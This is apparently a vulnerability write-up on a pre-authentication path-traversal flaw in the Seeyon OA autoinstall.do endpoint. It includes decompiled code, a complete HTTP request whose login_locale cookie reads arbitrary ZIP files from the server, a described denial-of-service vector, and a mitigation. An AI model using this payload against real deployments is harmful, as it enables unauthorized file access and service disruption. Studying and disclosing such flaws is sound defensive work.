How a Front‑End 0‑Day in a Major OA System Was Discovered and Exploited

Vulnerability Discovery (Arbitrary ZIP Download)

The author began by looking for file‑download related flaws, focusing on the Content‑Disposition header. By decompiling the OA's JAR files with jadx‑gui, they located a controller class named AutoInstallController that is reachable from the front‑end without authentication, as indicated by the @NeedlessCheckLogin annotation.

Further inspection revealed that the controller inherits from BaseController → MultiActionController, an early Spring MVC multi‑method dispatcher. The method name is resolved via the method request parameter.

PoC Construction

Using the bean name autoinstall.do as the route, the author examined the vulnerable method regInstallDown64. The method extracts a login_locale value from cookies, falls back to the Accept‑Language header, and builds a temporary ZIP file path:

String fileName = SystemEnvironment.getSystemTempFolder() + separator + "regInstall64_" + request.getServerName() + "_" + localeName + ".zip";

Because the cookie value is under attacker control and no validation is performed, the attacker can inject directory‑traversal sequences (e.g., ../ ) into localeName . The following HTTP request was crafted (note the malicious login_locale value): <code>POST /seeyon/autoinstall.do HTTP/1.1 Host: 192.168.127.129 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/144.0.0.0 Safari/537.36 Accept: application/json, text/javascript, */* Origin: http://192.168.127.129 Referer: http://192.168.127.129/seeyon/main.do?method=main Cookie: login_locale=/../../../Logs; Content-Type: application/x-www-form-urlencoded Content-Length: 23 method=regInstallDown64</code> This payload caused the server to read C:\Seeyon\A8\base\temporary\../../../Logs.zip , effectively retrieving an arbitrary ZIP file from the filesystem. Exploitation Details By sending the request, the attacker confirmed that the Logs.zip file could be downloaded, demonstrating successful directory traversal and arbitrary file read. Extended Impact (DoS Attack) Further code analysis showed that if the generated fileName does not exist, the server creates it and writes the supplied data into it via CtpLocalFile . By repeatedly supplying crafted login_locale values with different filenames, an attacker can flood the filesystem with arbitrary ZIP files, leading to a denial‑of‑service condition. Mitigation The author recommends filtering the login_locale cookie to reject path‑traversal characters such as ../ , thereby preventing both arbitrary file read and the DoS vector.